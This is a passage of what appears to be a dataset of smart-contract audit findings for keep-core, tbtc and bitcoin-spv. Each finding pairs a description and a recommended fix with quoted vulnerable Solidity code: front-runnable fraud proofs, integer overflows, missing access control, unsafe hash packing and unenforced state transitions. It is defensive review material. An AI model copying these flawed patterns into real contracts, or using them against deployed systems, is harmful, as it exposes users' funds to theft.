\\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. 
The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\n",Require the reporter to include `msg.sender` in the signature proving the fraud or implement a two-step commit/reveal scheme to counter front-running opportunities by forcing a reporter to secretly commit the fraud parameters in one block and reveal them in another.,,"```\\n/\\*\\*\\n \\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\n" +keep-core - operator contracts disabled via panic button can be re-enabled by RegistryKeeper,high,"The Registry contract defines three administrative accounts: `Governance`, `registryKeeper`, and `panicButton`. All permissions are initially assigned to the deployer when the contract is created. The account acting like a super-admin, being allowed to re-assign administrative accounts - is `Governance`. 
`registryKeeper` is a lower privileged account maintaining the registry and `panicButton` is an emergency account that can disable operator contracts.\\nThe keep specification states the following:\\nPanic Button The Panic Button can disable malicious or malfunctioning contracts that have been previously approved by the Registry Keeper. When a contract is disabled by the Panic Button, its status on the registry changes to reflect this, and it becomes ineligible to penalize operators. Contracts disabled by the Panic Button can not be reactivated. The Panic Button can be rekeyed by Governance.\\nIt is assumed that the permissions are `Governance` > `panicButton` > `registryKeeper`, meaning that `panicButton` should be able to overrule `registryKeeper`, while `registryKeeper` cannot overrule `panicButton`.\\nWith the current implementation of the Registry the `registryKeeper` account can re-enable an operator contract that has previously been disabled by the `panicButton` account.\\nWe would also like to note the following:\\nThe contract should use enums instead of integer literals when working with contract states.\\nChanges to the contract take effect immediately, allowing an administrative account to selectively front-run calls to the Registry ACL and interfere with user activity.\\nThe operator contract state can be set to the current value without raising an error.\\nThe panic button can be called for operator contracts that are not yet active.\\n```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\n","The keep specification states:\\nThe Panic Button can be used to set the status of an APPROVED contract to DISABLED. 
Operator Contracts disabled with the Panic Button cannot be re-enabled, and disabled contracts may not punish operators nor be selected by service contracts to perform work.\\nAll three accounts are typically trusted. We recommend requiring the `Governance` or `paniceButton` accounts to reset the contract operator state before `registryKeeper` can change the state or disallow re-enabling of disabled operator contracts as stated in the specification.",,```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\n +tbtc - State transitions are not always enforced,high,"A deposit follows a complex state-machine that makes sure it is correctly funded before `TBTC` Tokens are minted. The deposit lifecycle starts with a set of states modeling a funding flow that - if successful - ultimately leads to the deposit being active, meaning that corresponding `TBTC` tokens exist for the deposits. A redemption flow allows to redeem `TBTC` for `BTC` and a liquidation flow handles fraud and abort conditions. Fraud cases in the funding flow are handled separately.\\nState transitions from one deposit state to another require someone calling the corresponding transition method on the deposit and actually spend gas on it. The incentive to call a transition varies and is analyzed in more detail in the security-specification section of this report.\\nThis issue assumes that participants are not always pushing forward through the state machine as soon as a new state becomes available, opening up the possibility of having multiple state transitions being a valid option for a deposit (e.g. 
pushing a deposit to active state even though a timeout should have been called on it).\\nA TDT holder can choose not to call out `notifySignerSetupFailure` hoping that the signing group still forms after the signer setup timeout passes.\\nthere is no incentive for the TDT holder to terminate its own deposit after a timeout.\\nthe deposit might end up never being in a final error state.\\nthere is no incentive for the signing group to terminate the deposit.\\nThis affects all states that can time out.\\nThe deposit can be pushed to active state even after `notifySignerSetupFailure`, `notifyFundingTimeout` have passed but nobody called it out.\\nThere is no timeout check in `retrieveSignerPubkey`, `provideBTCFundingProof`.\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n```\\n\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n\\n require(\\_d.inAwaitingBTCFundingProof(), ""Not awaiting funding"");\\n\\n bytes8 \\_valueBytes;\\n bytes memory \\_utxoOutpoint;\\n```\\n\\nMembers of the signing group might decide to call `notifyFraudFundingTimeout` in a race to avoid late submissions for `provideFraudBTCFundingProof` to succeed in order to contain funds lost due to fraud.\\nIt 
should be noted that even after the fraud funding timeout passed the TDT holder could `provideFraudBTCFundingProof` as it does not check for the timeout.\\nA malicious signing group observes BTC funding on the bitcoin chain in an attempt to commit fraud at the time the `provideBTCFundingProof` transition becomes available to front-run `provideFundingECDSAFraudProof` forcing the deposit into active state.\\nThe malicious users of the signing group can then try to report fraud, set themselves as `liquidationInitiator` to be awarded part of the signer bond (in addition to taking control of the BTC collateral).\\nThe TDT holders fraud-proof can be front-run, see issue 5.15\\nIf oracle price slippage occurs for one block (flash-crash type of event) someone could call an undercollateralization transition.\\nFor severe oracle errors deposits might be liquidated by calling `notifyUndercollateralizedLiquidation`. The TDT holder cannot exit liquidation in this case.\\nFor non-severe under collateralization someone could call `notifyCourtesyCall` to impose extra effort on TDT holders to `exitCourtesyCall` deposits.\\nA deposit term expiration courtesy call can be exit in the rare case where `_d.fundedAt + TBTCConstants.getDepositTerm() == block.timestamp`\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), ""Not currently in courtesy call"");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit is expiring"");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, ""Deposit is still undercollateralized"");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n\\n```\\n/// @notice Notifies the contract that its term limit has been reached\\n/// @dev This 
initiates a courtesy call\\n/// @param \\_d deposit storage pointer\\nfunction notifyDepositExpiryCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inActive(), ""Deposit is not active"");\\n require(block.timestamp >= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit term not elapsed"");\\n \\_d.setCourtesyCall();\\n \\_d.logCourtesyCalled();\\n \\_d.courtesyCallInitiated = block.timestamp;\\n}\\n```\\n\\nAllow exiting the courtesy call only if the deposit is not expired: `block.timestamp < _d.fundedAt + TBTCConstants.getDepositTerm()`","Ensure that there are no competing interests between participants of the system to favor one transition over the other, causing race conditions, front-running opportunities or stale deposits that are not pushed to end-states.\\nNote: Please find an analysis of incentives to call state transitions in the security section of this document.",,"```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n```\\n" +tbtc - Funder loses payment to keep if signing group is not established in time Pending,high,"To create a new deposit, the funder has to pay for the creation of a keep. If establishing the keep does not succeed in time, fails or the signing group decides not to return a public key when `retrieveSignerPubkey` is called to transition from `awaiting_signer_setup` to `awaiting_btc_funding_proof` the signer setup fails. 
After a timeout of 3 hrs, anyone can force the deposit to transition from `awaiting_signer_setup` to `failed_setup` by calling `notifySignerSetupFailure`.\\nThe funder had to provide payment for the keep but the signing group failed to establish. Payment for the keep is not returned even though one could assume that the signing group tried to play unfairly. The signing group might intentionally try to cause this scenario to interfere with the system.\\n`retrieveSignerPubkey` fails if keep provided pubkey is empty or of an unexpected length\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), ""Keep returned bad pubkey"");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n\\n`notifySignerSetupFailure` can be called by anyone after a timeout of 3hrs\\n```\\n/// @notice Anyone may notify the contract that signing group setup has timed out\\n/// @dev We rely on the keep system punishes the signers in this case\\n/// @param \\_d deposit storage pointer\\nfunction notifySignerSetupFailure(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not awaiting setup"");\\n require(\\n 
block.timestamp > \\_d.signingGroupRequestedAt + TBTCConstants.getSigningGroupFormationTimeout(),\\n ""Signing group formation timeout not yet elapsed""\\n );\\n \\_d.setFailedSetup();\\n \\_d.logSetupFailed();\\n\\n fundingTeardown(\\_d);\\n}\\n```\\n",It should be ensured that a keep group always establishes or otherwise the funder is refunded the fee for the keep.,,"```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), ""Keep returned bad pubkey"");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n" +bitcoin-spv - SPV proofs do not support transactions with larger numbers of inputs and outputs Pending,high,"There is no explicit restriction on the number of inputs and outputs a Bitcoin transaction can have - as long as the transaction fits into a block. The number of inputs and outputs in a transaction is denoted by a leading “varint” - a variable length integer. 
In `BTCUtils.validateVin` and `BTCUtils.validateVout`, the value of this varint is restricted to under `0xFD`, or 253:\\n```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n\\nTransactions that include more than 252 inputs or outputs will not pass this validation, leading to some legitimate deposits being rejected by the tBTC system.\\nThe 252-item limit exists in a few forms throughout the system, outside of the aforementioned `BTCUtils.validateVin` and BTCUtils.validateVout:\\nBTCUtils.determineOutputLength:\\n```\\n/// @notice Determines the length of an output\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal pure returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, ""Multi-byte VarInts not supported"");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\nDepositUtils.findAndParseFundingOutput:\\n```\\nfunction findAndParseFundingOutput(\\n DepositUtils.Deposit storage \\_d,\\n bytes memory \\_txOutputVector,\\n uint8 \\_fundingOutputIndex\\n) public view returns (bytes8) {\\n```\\n\\nDepositUtils.validateAndParseFundingSPVProof:\\n```\\nfunction validateAndParseFundingSPVProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n 
uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public view returns (bytes8 \\_valueBytes, bytes memory \\_utxoOutpoint){\\n```\\n\\nDepositFunding.provideFraudBTCFundingProof:\\n```\\nfunction provideFraudBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositFunding.provideBTCFundingProof:\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositLiquidation.provideSPVFraudProof:\\n```\\nfunction provideSPVFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n uint8 \\_targetInputIndex,\\n bytes memory \\_bitcoinHeaders\\n) public {\\n```\\n",Resolution\\nThe client provided the following statement:\\nBenchmarks and takeaways are being tracked in issue https://github.com/keep-network/tbtc/issues/556.\\nIncorporate varint parsing in `BTCUtils.validateVin` and `BTCUtils.validateVout`. 
Ensure that other components of the system reflect the removal of the 252-item limit.,,"```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n" +bitcoin-spv - multiple integer under-/overflows,high,"The bitcoin-spv library allows for multiple integer under-/overflows while processing or converting potentially untrusted or user-provided data.\\n`uint8` underflow `uint256(uint8(_e - 3))`\\nNote: `_header[75]` will throw consuming all gas if out of bounds while the majority of the library usually uses `slice(start, 1)` to handle this more gracefully.\\n```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n\\n`uint8` overflow `uint256(uint8(_len + 8 + 1))`\\nNote: might allow a specially crafted output to return an invalid determineOutputLength <= 9.\\nNote: while type `VarInt` is implemented for inputs, it is not for the output length.\\n```\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal 
pure returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, ""Multi-byte VarInts not supported"");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\n`uint8` underflow `uint256(uint8(extractOutputScriptLen(_output)[0]) - 2)`\\n```\\n/// @dev Determines type by the length prefix and validates format\\n/// @param \\_output The output\\n/// @return The hash committed to by the pk\\_script, or null for errors\\nfunction extractHash(bytes memory \\_output) internal pure returns (bytes memory) {\\n if (uint8(\\_output.slice(9, 1)[0]) == 0) {\\n uint256 \\_len = uint8(extractOutputScriptLen(\\_output)[0]) - 2;\\n // Check for maliciously formatted witness outputs\\n if (uint8(\\_output.slice(10, 1)[0]) != uint8(\\_len)) {\\n return hex"""";\\n }\\n return \\_output.slice(11, \\_len);\\n } else {\\n bytes32 \\_tag = \\_output.keccak256Slice(8, 3);\\n```\\n\\n`BytesLib` input validation multiple start+length overflow\\nNote: multiple occurrences. 
should check `start+length > start && bytes.length >= start+length`\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), ""Slice out of bounds"");\\n```\\n\\n`BytesLib` input validation multiple start overflow\\n```\\nfunction toUint(bytes memory \\_bytes, uint \\_start) internal pure returns (uint256) {\\n require(\\_bytes.length >= (\\_start + 32), ""Uint conversion out of bounds."");\\n```\\n\\n```\\nfunction toAddress(bytes memory \\_bytes, uint \\_start) internal pure returns (address) {\\n require(\\_bytes.length >= (\\_start + 20), ""Address conversion out of bounds."");\\n```\\n\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), ""Slice out of bounds"");\\n```\\n\\n```\\nfunction keccak256Slice(bytes memory \\_bytes, uint \\_start, uint \\_length) pure internal returns (bytes32 result) {\\n require(\\_bytes.length >= (\\_start + \\_length), ""Slice out of bounds"");\\n```\\n","We believe that a general-purpose parsing and verification library for bitcoin payments should be very strict when processing untrusted user input. With strict we mean, that it should rigorously validate provided input data and only proceed with the processing of the data if it is within a safe-to-use range for the method to return valid results. 
Relying on the caller to provide pre-validated data can be unsafe especially if the caller assumes that proper input validation is performed by the library.\\nGiven the risk profile for this library, we recommend a conservative approach that favors security over gas efficiency without relying on certain calls or instructions to throw on invalid input.\\nFor this issue specifically, we recommend proper input validation and explicit type expansion where necessary to prevent values from wrapping or processing data for arguments that are not within a safe-to-use range.",,"```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n" +tbtc - Unreachable state LIQUIDATION_IN_PROGRESS,high,"According to the specification (overview, states, version 2020-02-06), a deposit can be in one of two liquidation_in_progress states.\\nLIQUIDATION_IN_PROGRESS\\nLIQUIDATION_IN_PROGRESS Liquidation due to undercollateralization or an abort has started Automatic (on-chain) liquidation was unsuccessful\\nFRAUD_LIQUIDATION_IN_PROGRESS\\nFRAUD_LIQUIDATION_IN_PROGRESS Liquidation due to fraud has started Automatic (on-chain) liquidation was unsuccessful\\nHowever, `LIQUIDATION_IN_PROGRESS` is unreachable and instead, `FRAUD_LIQUIDATION_IN_PROGRESS` is always called. 
This means that all non-fraud state transitions end up in the fraud liquidation path and will perform actions as if fraud was detected even though it might be caused by an undercollateralized notification or courtesy timeout.\\n`startSignerAbortLiquidation` transitions to `FRAUD_LIQUIDATION_IN_PROGRESS` on non-fraud events `notifyUndercollateralizedLiquidation` and `notifyCourtesyTimeout`\\n```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\n","Verify state transitions and either remove `LIQUIDATION_IN_PROGRESS` if it is redundant or fix the state transitions for non-fraud liquidations.\\nNote that Deposit states can be simplified by removing redundant states by setting a flag (e.g. 
fraudLiquidation) in the deposit instead of adding a state to track the fraud liquidation path.\\nAccording to the specification, we assume the following state transitions are desired:\\n`LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to undercollateralization or abort, the remaining bond value is split 50-50 between the account which triggered the liquidation and the signers.\\n`FRAUD_LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to fraud, the remaining bond value in full goes to the account which triggered the liquidation by proving fraud.",,"```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\n" +"tbtc - various deposit state transitions can be front-run (e.g. 
fraud proofs, timeouts) Won't Fix",high,"An entity that can provide proof for fraudulent ECDSA signatures or SPV proofs in the liquidation flow is rewarded with part of the deposit contract ETH value.\\nSpecification: Liquidation Any signer bond left over after the deposit owner is compensated is distributed to the account responsible for reporting the misbehavior (for fraud) or between the signers and the account that triggered liquidation (for collateralization issues).\\nHowever, the methods under which proof is provided are not protected from front-running allowing anyone to observe transactions to provideECDSAFraudProof/ `provideSPVFraudProof` and submit the same proofs with providing a higher gas value.\\nPlease note that a similar issue exists for timeout states providing rewards for calling them out (i.e. they set the `liquidationInitiator` address).\\n`provideECDSAFraudProof` verifies the fraudulent proof\\n`r,s,v,signedDigest` appear to be the fraudulent signature. `_preimage` is the correct value.\\n```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n ""Use provideFundingECDSAFraudProof instead""\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n ""Signer liquidation already in progress""\\n );\\n require(!\\_d.inEndState(), ""Contract has halted"");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), ""Signature is not fraud"");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n\\n`startSignerFraudLiquidation` sets the address that provides the proof as the beneficiary\\n```\\nfunction provideFundingECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory 
\\_preimage\\n) public {\\n require(\\n \\_d.inAwaitingBTCFundingProof(),\\n ""Signer fraud during funding flow only available while awaiting funding""\\n );\\n\\n bool \\_isFraud = \\_d.submitSignatureFraud(\\_v, \\_r, \\_s, \\_signedDigest, \\_preimage);\\n require(\\_isFraud, ""Signature is not fraudulent"");\\n \\_d.logFraudDuringSetup();\\n\\n // If the funding timeout has elapsed, punish the funder too!\\n if (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n } else {\\n /\\* NB: This is reuse of the variable \\*/\\n \\_d.fundingProofTimerStart = block.timestamp;\\n \\_d.setFraudAwaitingBTCFundingProof();\\n }\\n}\\n```\\n\\n`purchaseSignerBondsAtAuction` pays out the funds\\n```\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n","For fraud proofs, it should be required that the reporter uses a commit/reveal scheme to lock in a proof in one block, and reveal the details in another.",,"```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n ""Use provideFundingECDSAFraudProof instead""\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n ""Signer liquidation already in progress""\\n );\\n require(!\\_d.inEndState(), ""Contract has 
halted"");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), ""Signature is not fraud"");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n" +tbtc - Anyone can emit log events due to missing access control,high,"Access control for `DepositLog` is not implemented. `DepositLog` is inherited by `TBTCSystem` and its functionality is usually consumed by `Deposit` contracts to emit log events on `TBTCSystem`. Due to the missing access control, anyone can emit log events on `TBTCSystem`. Users, client-software or other components that rely on these events might be tricked into performing actions that were not authorized by the system.\\n```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\n",Log events are typically initiated by the Deposit contract. Make sure only Deposit contracts deployed by an approved factory can emit logs on TBTCSystem.,,```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\n +DKGResultVerification.verify unsafe packing in signed data,medium,"`DKGResultVerification.verify` allows the sender to arbitrarily move bytes between `groupPubKey` and misbehaved:\\n```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\n",Validate the expected length of both and add a salt between the two.,,"```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\n" +keep-core - Service contract callbacks can be abused to call into other contracts,medium,"`KeepRandomBeaconServiceImplV1` allows senders to specify an arbitrary method and contract that will receive a callback once the beacon generates a relay entry:\\n```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random 
